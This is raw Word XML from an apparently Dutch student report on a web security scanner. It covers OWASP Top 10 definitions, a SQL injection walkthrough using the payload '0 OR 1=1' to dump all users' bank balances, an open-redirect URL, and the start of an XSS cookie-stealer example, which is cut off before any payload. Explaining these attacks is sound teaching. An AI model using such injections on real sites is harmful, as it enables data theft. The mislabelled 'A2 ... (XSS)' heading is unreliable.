                <wp:docPr id="813" name="Rectangle 8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470CC" id="Rectangle 813" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-70.8pt;width:25pt;height:1031.7pt;z-index:-2500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M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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000F3896">
        <w:t>Klasse Diagram van Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C564AB4" w14:textId="475FF7EA" w:rsidR="000F3896" w:rsidRDefault="00CA49A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253300736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F0B5E54" wp14:editId="5DC11D04">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="5908675"/>
            <wp:effectExtent l="0" t="0" r="5080" b="9525"/>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Klassen Diagram scan.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5908675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA88CC3" w14:textId="2C39469A" w:rsidR="000242C2" w:rsidRDefault="000242C2">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB6A55" w14:textId="6A9BCC39" w:rsidR="00A65BD3" w:rsidRDefault="00A65BD3">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc496292475"/>
      <w:bookmarkStart w:id="69" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253310976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75F6A722" wp14:editId="4943EC33">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901239</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899334</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="833" name="Rectangle 8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8781E" id="Rectangle 833" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.95pt;margin-top:-70.75pt;width:25pt;height:1031.7pt;z-index:-2500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hu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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1818E9A2" w14:textId="75564D96" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253261824" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69159319" wp14:editId="6DACC78B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-898690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1244174</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="797" name="Rectangle 7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046D8" id="Rectangle 797" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.75pt;margin-top:-97.9pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>OWASP Definities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="0EC7B7FB" w14:textId="1E8C33BB" w:rsidR="00A666A2" w:rsidRPr="009131FF" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009131FF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A1 Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE9E0A4" w14:textId="3E7AD490" w:rsidR="00A666A2" w:rsidRPr="00C5361E" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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0D5BBFDC" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A2 Broken Authentication and Session Management (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC0AF4" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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7B9CF6AC" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="0013587D" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013587D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A3 Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB021FD" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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3314CA57" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A4 Insecure Direct Object References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA346DE" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A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75E295A0" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A5 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093194F" w14:textId="49681A1F" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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w:t>
      </w:r>
      <w:r w:rsidR="008D40E9" w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253288448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39BEE6E9" wp14:editId="71AFB1DE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895211</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1009354</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="856" name="Rectangle 8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DA452" id="Rectangle 856" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-79.45pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>staan waar hackers gebruik van kunnen maken door de error berichten uit te lezen om andere kwetsbaarheden te ontdekken ook kunnen mappen in het systeem verkeerde permissie rechten hebben ontvangen waardoor iedereen toegang kan verkrijgen tot deze mappen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E9AAD" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A6 Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC0DAC7" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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3395EEEB" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A7 Missing Function Level Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB730F" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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5E79B713" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A8 Cross Site Request Forgery Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E714FAE" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:r w:rsidRPr="001D4F2E">
        <w:t>Cross Site Request Forgery Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AC91C" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="001D4F2E" w:rsidRDefault="00A666A2" w:rsidP="00A666A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24D21D9A" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A9 Using Components with Known Vulnerabilities Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC65C09" w14:textId="77777777" w:rsidR="00A666A2" w:rsidRDefault="00A666A2" w:rsidP="00A666A2">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0197EEF5" w14:textId="77777777" w:rsidR="00876608" w:rsidRDefault="00876608" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB6D2B2" w14:textId="77777777" w:rsidR="00876608" w:rsidRDefault="00876608" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C59CDC" w14:textId="66DA669C" w:rsidR="00A666A2" w:rsidRPr="00A60186" w:rsidRDefault="00876608" w:rsidP="00A666A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253286400" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A8512FD" wp14:editId="0C89980F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1008650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="853" name="Rectangle 8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E4AFD" id="Rectangle 853" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.6pt;margin-top:-79.35pt;width:25pt;height:1031.7pt;z-index:-2500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F/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OK1OT0okn6Oqmlbl5HRa&#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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A666A2" w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>A10 Unvalidated Redirects and Forwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD211A" w14:textId="60245BC8" w:rsidR="00CF3AE8" w:rsidRDefault="00A666A2">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150" w:history="1">
        <w:r w:rsidRPr="0028560A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.testwebsite.nl/redirect.php?id=http://testlink.nl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF3AE8">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="70" w:name="_Toc496292477"/>
    <w:p w14:paraId="3C56253E" w14:textId="35F17F07" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253274112" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3634C096" wp14:editId="75486C00">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1016887</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="849" name="Rectangle 8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2FF97" id="Rectangle 849" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-80pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00CF3AE8">
        <w:t>SQL injectie voorbeeld</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="609727B0" w14:textId="0A172BA1" w:rsidR="00CF3AE8" w:rsidRPr="000E3B41" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3B41">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Meer data teruggeven dan verwacht</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA6B26" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>In dit voorbeeld wilt de ontwikkelaar het accountnummer en balans tonen van de gebruiker die op dat moment is ingelogd. Om de gebruikersdata op te kunnen vragen wordt de gebruikers ID opgestuurd als argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534D4CF9" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33BF2E2F" wp14:editId="485B93B8">
            <wp:extent cx="5760720" cy="2218055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="842"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578EC0D3" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A884CBA" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">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Pr="00FC4851">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>https://onlinebankeren/balans?userId=487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F42886" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>De SQL-query die uitgevoerd zou worden zal dan zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C39C49"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394F5CE2" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Deze SQL-query zal door de database uitgevoerd worden en het accountnummer en balans van eindgebruiker 487 zal op de website getoond worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB2511" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="006B346C" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B346C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiteren van </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kwetsbaarheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B9C449" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">Het exploiteren van dit voorbeeld is niet moeilijk, de aanvaller/hacker hoeft alleen maar te weten dat de input van de eindgebruikers niet schoon wordt gemaakt (sanitize) van verkeerde data. De globale variabele </w:t>
      </w:r>
      <w:r w:rsidRPr="005969BB">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>$_POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  op regel 3 (figuur 3.3) wordt zonder voorzorgmaatregelingen er in geplaatst en uitgevoerd. Dit betekent dat de aanvaller/hacker SQL-injecties kan uitvoeren. Een veelgebruikte SQL-injectie is: 0 OR 1=1, wat resulteert naar de SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ABE676"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2EB4EA5A" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r w:rsidRPr="005D1BBF">
        <w:t xml:space="preserve">Als deze SQL-query wordt uitgevoerd dan zal het alle accountgegevens teruggeven die in de database opgeslagen staan. </w:t>
      </w:r>
      <w:r>
        <w:t>De aanvaller/hacker heeft nu het accountnummer en balansgegevens van alle gebruikers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F3BFC" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Voorbeeld van een XSS-aanval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFD22B7" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">De anatomie van een XSS-aanval bestaat uit een webapplicatie waarop ongecodeerde en niet gevalideerde gebruikers input geplaats kan worden en een webbrowser die het de programmeertaal javascript kan interpreteren en runnen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C299D2C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Ik zal zoals bij de SQLi een case aantonen hoe schadelijk XSS kan zijn voor gebruikers. In deze case zal de hacker een cookie stelen met waardevolle data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4048980D" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="71" w:name="_Toc496292478"/>
    <w:p w14:paraId="6CC9EC86" w14:textId="416177EC" w:rsidR="00474843" w:rsidRDefault="00474843" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF00F7">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253276160" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A3638F3" wp14:editId="0A5D891B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1012112</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="850" name="Rectangle 8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72132" id="Rectangle 850" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-79.65pt;width:25pt;height:1031.7pt;z-index:-2500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FrJE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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00EF00F7">
        <w:t>XSS voorbeelden</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="737F80E4" w14:textId="7809D2C4" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00720A5A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Simpele cookie ste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00720A5A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8097D8" w14:textId="17214F68" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">In dit voorbeeld wordt er een XSS-aanval via de adresbalk uitgevoerd. De website vraagt om de gebruikersnaam (username) van een gebruiker zodat het op de website kan worden uitgeprint als hyperlink. De gebruiker is ingelogd met zijn account en maakt gebruik van een sessie ID. Deze sessie ID’s worden door de browser opgeslagen in een cookie bestand dat op de lokale systeem van het slachtoffer wordt geplaatst.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E44C3" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C3EE117" wp14:editId="134E3B1A">
            <wp:extent cx="5760720" cy="643890"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="84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5AB0BA17" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DFE89C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00367610" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="253265920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B3DFEC8" wp14:editId="54640A2F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>22860</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3437255" cy="1057910"/>
                <wp:effectExtent l="0" t="0" r="10795" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="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9EBBFBA" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00367610">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6427483E" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
